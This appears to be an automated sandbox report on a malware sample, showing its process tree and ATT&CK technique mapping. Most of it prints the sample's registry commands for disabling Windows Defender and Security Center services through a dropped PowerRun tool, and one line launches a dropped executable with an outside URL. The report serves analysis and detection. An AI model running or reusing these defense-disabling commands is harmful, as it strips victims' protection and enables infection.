    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1292
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
    3⤵
    PID:808
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender notification settings
    - System Location Discovery: System Language Discovery
    PID:4980
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender notification settings
    - System Location Discovery: System Language Discovery
    PID:504
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3504
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1324
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3528
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2824
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:2084
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4144
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2656
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:876
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3588
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2592
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3428
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:4236
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5028
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1940
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:3296
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3340
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2284
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:5056
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4368
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1028
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:464
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies security service
        
        PID:4204
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:1616
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:4312
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies security service
        
        PID:3564
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:2572
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:3724
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:4124
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:1304
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:60
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:1268
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3136
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:4528
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:4104
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:3560
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3920
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:4356
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:3048
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:5084
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3084
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:4084
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:3428
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:2728
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1528
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:4952
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:2116
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:4776
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2680
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:1492
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:1292
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:4100
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1616
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies security service
        
        PID:2556
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:2000
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:2440
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2620
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies security service
        
        PID:4144
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:2156
  - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:3436
    - - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:828
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:3684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Get-MpPreference"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:3900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:3420
- C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\mbbyfatkrvotaiy.exe
  "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\mbbyfatkrvotaiy.exe" "http://www.snowstormamer.click" "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\5679"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:464
- C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\win_version_csharp.exe
  "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\win_version_csharp.exe"
  2⤵
  - Executes dropped EXE
  PID:3824
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\system32\explorer.exe
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:3232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry